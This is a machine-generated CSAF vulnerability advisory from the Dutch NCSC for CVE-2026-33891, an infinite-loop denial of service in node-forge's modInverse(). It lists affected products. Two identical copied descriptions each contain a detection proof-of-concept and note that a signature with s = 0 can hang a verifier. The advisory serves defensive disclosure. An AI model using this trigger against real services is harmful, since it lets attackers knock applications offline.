{
    "document": {
        "category": "csaf_base",
        "csaf_version": "2.0",
        "distribution": {
            "tlp": {
                "label": "WHITE"
            }
        },
        "lang": "en",
        "notes": [
            {
                "category": "legal_disclaimer",
                "text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this portal to enhance access to its information and vulnerabilities. The use of this information is subject to the following terms and conditions:\n\nThe vulnerabilities disclosed in this portal are gathered by NCSC-NL from a variety of open sources, which the user can retrieve from other platforms. NCSC-NL makes every reasonable effort to ensure that the content of this portal is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or real-time keeping up-to-date. NCSC-NL does not control nor guarantee the accuracy, relevance, timeliness or completeness of information obtained from these external sources. The vulnerabilities disclosed in this portal are intended solely for the convenience of professional parties to take appropriate measures to manage the risks posed to cybersecurity. No rights can be derived from the information provided therein.\n\nNCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability of use of the vulnerabilities disclosed in this portal. This includes damage resulting from the inaccuracy or incompleteness of the information contained in it.\nThe information on this page is subject to Dutch law. All disputes related to or arising from the use of this portal regarding the disclosure of vulnerabilities will be submitted to the competent court in The Hague. This choice of means also applies to the court in summary proceedings."
            }
        ],
        "publisher": {
            "category": "coordinator",
            "contact_details": "cert@ncsc.nl",
            "name": "National Cyber Security Centre",
            "namespace": "https://www.ncsc.nl/"
        },
        "title": "CVE-2026-33891",
        "tracking": {
            "current_release_date": "2026-03-31T12:20:14.809010Z",
            "generator": {
                "date": "2026-02-17T15:00:00Z",
                "engine": {
                    "name": "V.E.L.M.A",
                    "version": "1.7"
                }
            },
            "id": "CVE-2026-33891",
            "initial_release_date": "2026-03-26T22:54:48.067895Z",
            "revision_history": [
                {
                    "date": "2026-03-26T22:54:48.067895Z",
                    "number": "1",
                    "summary": "CVE created.| Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (3).| CWES updated (1)."
                },
                {
                    "date": "2026-03-26T22:54:50.708949Z",
                    "number": "2",
                    "summary": "NCSC Score created."
                },
                {
                    "date": "2026-03-27T00:21:02.614608Z",
                    "number": "3",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (1).| References created (2).| CWES updated (1)."
                },
                {
                    "date": "2026-03-28T07:38:05.891543Z",
                    "number": "4",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (2).| CWES updated (1)."
                },
                {
                    "date": "2026-03-28T07:39:03.730383Z",
                    "number": "5",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products created (1).| References created (2).| CWES updated (1)."
                },
                {
                    "date": "2026-03-28T07:39:14.786334Z",
                    "number": "6",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-28T07:40:46.979052Z",
                    "number": "7",
                    "summary": "References created (1)."
                },
                {
                    "date": "2026-03-28T07:43:40.136058Z",
                    "number": "8",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-28T12:27:55.512310Z",
                    "number": "9",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (36).| Product Identifiers created (13).| Product Remediations created (36).| References created (4).| CWES updated (1).| Vendor_assessment created."
                },
                {
                    "date": "2026-03-28T12:28:08.508341Z",
                    "number": "10",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-29T00:38:39.434002Z",
                    "number": "11",
                    "summary": "Source connected.| CVE status created. (valid)| EPSS created."
                },
                {
                    "date": "2026-03-30T16:39:22.594869Z",
                    "number": "12",
                    "summary": "Unknown change."
                },
                {
                    "date": "2026-03-31T12:19:57.649010Z",
                    "number": "13",
                    "summary": "Source connected.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (2).| CWES updated (1)."
                },
                {
                    "date": "2026-03-31T12:20:00.232691Z",
                    "number": "14",
                    "summary": "NCSC Score updated."
                }
            ],
            "status": "interim",
            "version": "14"
        }
    },
    "product_tree": {
        "branches": [
            {
                "branches": [
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:rpm/4",
                                "product": {
                                    "name": "vers:rpm/4",
                                    "product_id": "CSAFPID-2552001",
                                    "product_identification_helper": {
                                        "cpe": "cpe:/a:redhat:cryostat:4"
                                    }
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "Cryostat 4"
                    },
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:rpm/5",
                                "product": {
                                    "name": "vers:rpm/5",
                                    "product_id": "CSAFPID-1459353",
                                    "product_identification_helper": {
                                        "cpe": "cpe:/a:redhat:logging:5"
                                    }
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "Logging Subsystem for Red Hat OpenShift"
                    },
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:rpm/2",
                                "product": {
                                    "name": "vers:rpm/2",
                                    "product_id": "CSAFPID-1508257",
                                    "product_identification_helper": {
                                        "cpe": "cpe:/a:redhat:ansible_automation_platform:2"
                                    }
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "Red Hat Ansible Automation Platform 2"
                    },
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:rpm/1",
                                "product": {
                                    "name": "vers:rpm/1",
                                    "product_id": "CSAFPID-5940623",
                                    "product_identification_helper": {
                                        "cpe": "cpe:/a:redhat:podman_desktop:1"
                                    }
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "Red Hat Build of Podman Desktop"
                    },
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:rpm/8",
                                "product": {
                                    "name": "vers:rpm/8",
                                    "product_id": "CSAFPID-1439292",
                                    "product_identification_helper": {
                                        "cpe": "cpe:/a:redhat:jboss_data_grid:8"
                                    }
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "Red Hat Data Grid 8"
                    },
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:rpm/10",
                                "product": {
                                    "name": "vers:rpm/10",
                                    "product_id": "CSAFPID-2858634",
                                    "product_identification_helper": {
                                        "cpe": "cpe:/o:redhat:enterprise_linux:10"
                                    }
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "Red Hat Enterprise Linux 10"
                    },
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:rpm/8",
                                "product": {
                                    "name": "vers:rpm/8",
                                    "product_id": "CSAFPID-1439317",
                                    "product_identification_helper": {
                                        "cpe": "cpe:/o:redhat:enterprise_linux:8"
                                    }
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "Red Hat Enterprise Linux 8"
                    },
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:rpm/9",
                                "product": {
                                    "name": "vers:rpm/9",
                                    "product_id": "CSAFPID-1439319",
                                    "product_identification_helper": {
                                        "cpe": "cpe:/a:redhat:enterprise_linux:9"
                                    }
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "Red Hat Enterprise Linux 9"
                    },
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:rpm/7",
                                "product": {
                                    "name": "vers:rpm/7",
                                    "product_id": "CSAFPID-1439294",
                                    "product_identification_helper": {
                                        "cpe": "cpe:/a:redhat:jboss_fuse:7"
                                    }
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "Red Hat Fuse 7"
                    },
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:rpm/7",
                                "product": {
                                    "name": "vers:rpm/7",
                                    "product_id": "CSAFPID-1439306",
                                    "product_identification_helper": {
                                        "cpe": "cpe:/a:redhat:jboss_enterprise_bpms_platform:7"
                                    }
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "Red Hat Process Automation 7"
                    },
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:rpm/3",
                                "product": {
                                    "name": "vers:rpm/3",
                                    "product_id": "CSAFPID-1441200",
                                    "product_identification_helper": {
                                        "cpe": "cpe:/a:redhat:quay:3"
                                    }
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "Red Hat Quay 3"
                    },
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:rpm/4",
                                "product": {
                                    "name": "vers:rpm/4",
                                    "product_id": "CSAFPID-2467441",
                                    "product_identification_helper": {
                                        "cpe": "cpe:/a:redhat:rhboac_hawtio:4"
                                    }
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "Red Hat build of Apache Camel - HawtIO 4"
                    },
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:rpm/2",
                                "product": {
                                    "name": "vers:rpm/2",
                                    "product_id": "CSAFPID-2467443",
                                    "product_identification_helper": {
                                        "cpe": "cpe:/a:redhat:service_registry:2"
                                    }
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "Red Hat build of Apicurio Registry 2"
                    },
                    {
                        "branches": [
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-1837472"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "automation-eda-controller"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-1837473"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "automation-gateway"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-5222698"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "automation-platform-ui"
                            }
                        ],
                        "category": "product_family",
                        "name": "Red Hat Ansible Automation Platform 2"
                    },
                    {
                        "branches": [
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-5187689"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "elasticsearch-operator-bundle"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-2914696"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "elasticsearch-proxy-rhel9"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-2914697"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "elasticsearch-rhel9-operator"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-2855724"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "elasticsearch6-rhel9"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-1459355"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "kibana6-rhel8"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-2855725"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "logging-curator5-rhel9"
                            }
                        ],
                        "category": "product_family",
                        "name": "Logging Subsystem for Red Hat OpenShift"
                    },
                    {
                        "branches": [
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-2868420"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "grafana"
                            }
                        ],
                        "category": "product_family",
                        "name": "Red Hat Enterprise Linux 10"
                    },
                    {
                        "branches": [
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-1496261"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "grafana"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-2109953"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "pcs"
                            }
                        ],
                        "category": "product_family",
                        "name": "Red Hat Enterprise Linux 9"
                    },
                    {
                        "branches": [
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-2467444"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "io.apicurio-apicurio-registry"
                            }
                        ],
                        "category": "product_family",
                        "name": "Red Hat build of Apicurio Registry 2"
                    },
                    {
                        "branches": [
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-2467448"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "io.apicurio-apicurito"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-1771999"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "io.syndesis-syndesis-parent"
                            }
                        ],
                        "category": "product_family",
                        "name": "Red Hat Fuse 7"
                    },
                    {
                        "branches": [
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-2698055"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "io.cryostat-cryostat"
                            }
                        ],
                        "category": "product_family",
                        "name": "Cryostat 4"
                    },
                    {
                        "branches": [
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-2467442"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "io.hawt-project"
                            }
                        ],
                        "category": "product_family",
                        "name": "Red Hat build of Apache Camel - HawtIO 4"
                    },
                    {
                        "branches": [
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-2467445"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "org.infinispan-infinispan-console"
                            }
                        ],
                        "category": "product_family",
                        "name": "Red Hat Data Grid 8"
                    },
                    {
                        "branches": [
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-2698057"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "org.uberfire-uberfire-parent"
                            }
                        ],
                        "category": "product_family",
                        "name": "Red Hat Process Automation 7"
                    },
                    {
                        "branches": [
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-2109952"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "pcs"
                            }
                        ],
                        "category": "product_family",
                        "name": "Red Hat Enterprise Linux 8"
                    },
                    {
                        "branches": [
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-5940626"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "podman-desktop-macos-1"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-5940629"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "podman-desktop-windows-1"
                            }
                        ],
                        "category": "product_family",
                        "name": "Red Hat Build of Podman Desktop"
                    },
                    {
                        "branches": [
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-1455906"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "quay-rhel8"
                            }
                        ],
                        "category": "product_family",
                        "name": "Red Hat Quay 3"
                    }
                ],
                "category": "vendor",
                "name": "Red Hat"
            },
            {
                "branches": [
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/<1.4.0",
                                "product": {
                                    "name": "vers:unknown/<1.4.0",
                                    "product_id": "CSAFPID-5956281"
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "Forge"
                    }
                ],
                "category": "vendor",
                "name": "Digital Bazaar"
            },
            {
                "branches": [
                    {
                        "branches": [
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:microsoft/*",
                                        "product": {
                                            "name": "vers:microsoft/*",
                                            "product_id": "CSAFPID-5197899",
                                            "product_identification_helper": {
                                                "cpe": "cpe:2.3:a:microsoft:azl3_python-tensorboard_2.16.2-6:*:*:*:*:*:*:*:*"
                                            }
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "azl3 python-tensorboard 2.16.2-6 on Azure Linux 3.0"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:microsoft/*",
                                        "product": {
                                            "name": "vers:microsoft/*",
                                            "product_id": "CSAFPID-5733329",
                                            "product_identification_helper": {
                                                "cpe": "cpe:2.3:a:microsoft:cbl2_reaper_3.1.1-22:*:*:*:*:*:*:*:*"
                                            }
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "cbl2 reaper 3.1.1-22 on CBL Mariner 2.0"
                            }
                        ],
                        "category": "product_family",
                        "name": "Open Source Software"
                    }
                ],
                "category": "vendor",
                "name": "Microsoft"
            },
            {
                "branches": [
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/>=0|<1.4.0",
                                "product": {
                                    "name": "vers:unknown/>=0|<1.4.0",
                                    "product_id": "CSAFPID-5920253"
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "node-forge"
                    }
                ],
                "category": "vendor",
                "name": "digitalbazaar"
            }
        ]
    },
    "vulnerabilities": [
        {
            "cve": "CVE-2026-33891",
            "cwe": {
                "id": "CWE-835",
                "name": "Loop with Unreachable Exit Condition ('Infinite Loop')"
            },
            "notes": [
                {
                    "category": "description",
                    "text": "## Summary\n\nA Denial of Service (DoS) vulnerability exists in the node-forge library due to an infinite loop in the BigInteger.modInverse() function (inherited from the bundled jsbn library). When modInverse() is called with a zero value as input, the internal Extended Euclidean Algorithm enters an unreachable exit condition, causing the process to hang indefinitely and consume 100% CPU.\n\n## Affected Package\n\nPackage name: node-forge (npm: node-forge)\nRepository: https://github.com/digitalbazaar/forge\nAffected versions: All versions (including the latest at the time of writing)\nAffected file: lib/jsbn.js, function bnModInverse()\nRoot cause component: Bundled copy of the jsbn (JavaScript Big Number) library\n\n## Vulnerability Details\n\nType: Denial of Service (DoS)\nCWE: CWE-835 (Loop with Unreachable Exit Condition)\nAttack vector: Network (if the application processes untrusted input that reaches modInverse)\nPrivileges required: None\nUser interaction: None\nImpact: Availability (process hangs indefinitely)\nSuggested CVSS v3.1 score: 5.3–7.5 (depending on the context of usage)\n\n## Root Cause Analysis\n\nThe BigInteger.prototype.modInverse(m) function in lib/jsbn.js implements the Extended Euclidean Algorithm to compute the modular multiplicative inverse of this modulo m.\nMathematically, the modular inverse of 0 does not exist — gcd(0, m) = m ≠ 1 for any m > 1. However, the implementation does not check whether the input value is zero before entering the algorithm's main loop. When this equals 0, the algorithm's loop condition is never satisfied for termination, resulting in an infinite loop.\nThe relevant code path in lib/jsbn.js:\n```js\nfunction bnModInverse(m) {\n  // ... 
setup ...\n  // No check for this == 0\n  // Enters Extended Euclidean Algorithm loop that never terminates when this == 0\n}\n```\n\n## Attack Scenario\n\nAny application using node-forge that passes attacker-controlled or untrusted input to a code path involving modInverse() is vulnerable. Potential attack surfaces include:\n\nDSA/ECDSA signature verification — A crafted signature with s = 0 would trigger s.modInverse(q), causing the verifier to hang.\nCustom RSA or Diffie-Hellman implementations — Applications performing modular arithmetic with user-supplied parameters.\nAny cryptographic protocol where an attacker can influence a value that is subsequently passed to modInverse().\n\nA single malicious request can cause the Node.js event loop to block indefinitely, rendering the entire application unresponsive.\n\n## Proof of Concept\n\nEnvironment Setup\n```bash\nmkdir forge-poc && cd forge-poc\nnpm init -y\nnpm install node-forge\n```\nReproduction (poc.js)\nA single script that safely detects the vulnerability using a child process with timeout. 
The parent process is never at risk of hanging.\n```bash\nmkdir forge-poc && cd forge-poc\nnpm init -y\nnpm install node-forge\n# Save the script below as poc.js, then run:\nnode poc.js\n```\n```javascript\n'use strict';\nconst { spawnSync } = require('child_process');\n\nconst childCode = `\n  const forge = require('node-forge');\n  // jsbn may not be auto-loaded; try explicit require if needed\n  if (!forge.jsbn) {\n    try { require('node-forge/lib/jsbn'); } catch(e) {}\n  }\n  if (!forge.jsbn || !forge.jsbn.BigInteger) {\n    console.error('ERROR: forge.jsbn.BigInteger not available');\n    process.exit(2);\n  }\n  const BigInteger = forge.jsbn.BigInteger;\n  const zero = new BigInteger('0', 10);\n  const mod = new BigInteger('3', 10);\n  // This call should throw or return 0, but instead loops forever\n  const inv = zero.modInverse(mod);\n  console.log('returned: ' + inv.toString());\n`;\n\nconsole.log('[*] Testing: BigInteger(0).modInverse(3)');\nconsole.log('[*] Expected: throw an error or return quickly');\nconsole.log('[*] Spawning child process with 5s timeout...');\nconsole.log();\n\nconst result = spawnSync(process.execPath, ['-e', childCode], {\n  encoding: 'utf8',\n  timeout: 5000,\n});\n\nif (result.error && result.error.code === 'ETIMEDOUT') {\n  console.log('[VULNERABLE] Child process timed out after 5s');\n  console.log('  -> modInverse(0, 3) entered an infinite loop (DoS confirmed)');\n  process.exit(0);\n}\n\nif (result.status === 2) {\n  console.log('[ERROR] Could not access BigInteger:', result.stderr.trim());\n  console.log('  -> Check your node-forge installation');\n  process.exit(1);\n}\n\nif (result.status === 0) {\n  console.log('[NOT VULNERABLE] modInverse returned:', result.stdout.trim());\n  process.exit(1);\n}\n\nconsole.log('[NOT VULNERABLE] Child exited with error (status ' + result.status + ')');\nif (result.stderr) console.log('  stderr:', result.stderr.trim());\nprocess.exit(1);\n```\nExpected Output\n```\n[*] Testing: 
BigInteger(0).modInverse(3)\n[*] Expected: throw an error or return quickly\n[*] Spawning child process with 5s timeout...\n\n[VULNERABLE] Child process timed out after 5s\n  -> modInverse(0, 3) entered an infinite loop (DoS confirmed)\n```\nVerified On\n\nnode-forge v1.3.1 (latest at time of writing)\nNode.js v18.x / v20.x / v22.x\nmacOS / Linux / Windows\n\n## Impact\n\nAvailability: An attacker can cause a complete Denial of Service by sending a single crafted input that reaches the modInverse() code path. The Node.js process will hang indefinitely, blocking the event loop and making the application unresponsive to all subsequent requests.\nScope: node-forge is a widely used cryptographic library with millions of weekly downloads on npm. Any application that processes untrusted cryptographic parameters through node-forge may be affected.\n\n## Suggested Fix\n\nAdd a zero-value check at the entry of bnModInverse() in lib/jsbn.js:\n```javascript\nfunction bnModInverse(m) {\n  var ac = m.isEven();\n  // Add this check:\n  if (this.signum() == 0) {\n    throw new Error('BigInteger has no modular inverse: input is zero');\n  }\n  // ... rest of the existing implementation ...\n}\n```\nAlternatively, return BigInteger.ZERO if that behavior is preferred, though throwing an error is more mathematically correct and consistent with other BigInteger implementations (e.g., Java's BigInteger.modInverse() throws ArithmeticException).",
                    "title": "github - https://api.github.com/advisories/GHSA-5m6q-g25r-mvwx"
                },
                {
                    "category": "description",
                    "text": "## Summary\n\nA Denial of Service (DoS) vulnerability exists in the node-forge library due to an infinite loop in the BigInteger.modInverse() function (inherited from the bundled jsbn library). When modInverse() is called with a zero value as input, the internal Extended Euclidean Algorithm enters an unreachable exit condition, causing the process to hang indefinitely and consume 100% CPU.\n\n## Affected Package\n\nPackage name: node-forge (npm: node-forge)\nRepository: https://github.com/digitalbazaar/forge\nAffected versions: All versions (including the latest at the time of writing)\nAffected file: lib/jsbn.js, function bnModInverse()\nRoot cause component: Bundled copy of the jsbn (JavaScript Big Number) library\n\n## Vulnerability Details\n\nType: Denial of Service (DoS)\nCWE: CWE-835 (Loop with Unreachable Exit Condition)\nAttack vector: Network (if the application processes untrusted input that reaches modInverse)\nPrivileges required: None\nUser interaction: None\nImpact: Availability (process hangs indefinitely)\nSuggested CVSS v3.1 score: 5.3–7.5 (depending on the context of usage)\n\n## Root Cause Analysis\n\nThe BigInteger.prototype.modInverse(m) function in lib/jsbn.js implements the Extended Euclidean Algorithm to compute the modular multiplicative inverse of this modulo m.\nMathematically, the modular inverse of 0 does not exist — gcd(0, m) = m ≠ 1 for any m > 1. However, the implementation does not check whether the input value is zero before entering the algorithm's main loop. When this equals 0, the algorithm's loop condition is never satisfied for termination, resulting in an infinite loop.\nThe relevant code path in lib/jsbn.js:\n```js\nfunction bnModInverse(m) {\n  // ... 
setup ...\n  // No check for this == 0\n  // Enters Extended Euclidean Algorithm loop that never terminates when this == 0\n}\n```\n\n## Attack Scenario\n\nAny application using node-forge that passes attacker-controlled or untrusted input to a code path involving modInverse() is vulnerable. Potential attack surfaces include:\n\nDSA/ECDSA signature verification — A crafted signature with s = 0 would trigger s.modInverse(q), causing the verifier to hang.\nCustom RSA or Diffie-Hellman implementations — Applications performing modular arithmetic with user-supplied parameters.\nAny cryptographic protocol where an attacker can influence a value that is subsequently passed to modInverse().\n\nA single malicious request can cause the Node.js event loop to block indefinitely, rendering the entire application unresponsive.\n\n## Proof of Concept\n\nEnvironment Setup\n```bash\nmkdir forge-poc && cd forge-poc\nnpm init -y\nnpm install node-forge\n```\nReproduction (poc.js)\nA single script that safely detects the vulnerability using a child process with timeout. 
The parent process is never at risk of hanging.\n```bash\nmkdir forge-poc && cd forge-poc\nnpm init -y\nnpm install node-forge\n# Save the script below as poc.js, then run:\nnode poc.js\n```\n```javascript\n'use strict';\nconst { spawnSync } = require('child_process');\n\nconst childCode = `\n  const forge = require('node-forge');\n  // jsbn may not be auto-loaded; try explicit require if needed\n  if (!forge.jsbn) {\n    try { require('node-forge/lib/jsbn'); } catch(e) {}\n  }\n  if (!forge.jsbn || !forge.jsbn.BigInteger) {\n    console.error('ERROR: forge.jsbn.BigInteger not available');\n    process.exit(2);\n  }\n  const BigInteger = forge.jsbn.BigInteger;\n  const zero = new BigInteger('0', 10);\n  const mod = new BigInteger('3', 10);\n  // This call should throw or return 0, but instead loops forever\n  const inv = zero.modInverse(mod);\n  console.log('returned: ' + inv.toString());\n`;\n\nconsole.log('[*] Testing: BigInteger(0).modInverse(3)');\nconsole.log('[*] Expected: throw an error or return quickly');\nconsole.log('[*] Spawning child process with 5s timeout...');\nconsole.log();\n\nconst result = spawnSync(process.execPath, ['-e', childCode], {\n  encoding: 'utf8',\n  timeout: 5000,\n});\n\nif (result.error && result.error.code === 'ETIMEDOUT') {\n  console.log('[VULNERABLE] Child process timed out after 5s');\n  console.log('  -> modInverse(0, 3) entered an infinite loop (DoS confirmed)');\n  process.exit(0);\n}\n\nif (result.status === 2) {\n  console.log('[ERROR] Could not access BigInteger:', result.stderr.trim());\n  console.log('  -> Check your node-forge installation');\n  process.exit(1);\n}\n\nif (result.status === 0) {\n  console.log('[NOT VULNERABLE] modInverse returned:', result.stdout.trim());\n  process.exit(1);\n}\n\nconsole.log('[NOT VULNERABLE] Child exited with error (status ' + result.status + ')');\nif (result.stderr) console.log('  stderr:', result.stderr.trim());\nprocess.exit(1);\n```\nExpected Output\n```\n[*] Testing: 
BigInteger(0).modInverse(3)\n[*] Expected: throw an error or return quickly\n[*] Spawning child process with 5s timeout...\n\n[VULNERABLE] Child process timed out after 5s\n  -> modInverse(0, 3) entered an infinite loop (DoS confirmed)\n```\nVerified On\n\nnode-forge v1.3.1 (latest at time of writing)\nNode.js v18.x / v20.x / v22.x\nmacOS / Linux / Windows\n\n## Impact\n\nAvailability: An attacker can cause a complete Denial of Service by sending a single crafted input that reaches the modInverse() code path. The Node.js process will hang indefinitely, blocking the event loop and making the application unresponsive to all subsequent requests.\nScope: node-forge is a widely used cryptographic library with millions of weekly downloads on npm. Any application that processes untrusted cryptographic parameters through node-forge may be affected.\n\n## Suggested Fix\n\nAdd a zero-value check at the entry of bnModInverse() in lib/jsbn.js:\n```javascript\nfunction bnModInverse(m) {\n  var ac = m.isEven();\n  // Add this check:\n  if (this.signum() == 0) {\n    throw new Error('BigInteger has no modular inverse: input is zero');\n  }\n  // ... rest of the existing implementation ...\n}\n```\nAlternatively, return BigInteger.ZERO if that behavior is preferred, though throwing an error is more mathematically correct and consistent with other BigInteger implementations (e.g., Java's BigInteger.modInverse() throws ArithmeticException).",
                    "title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/npm%2FGHSA-5m6q-g25r-mvwx.json?alt=media"
                },
                {
                    "category": "description",
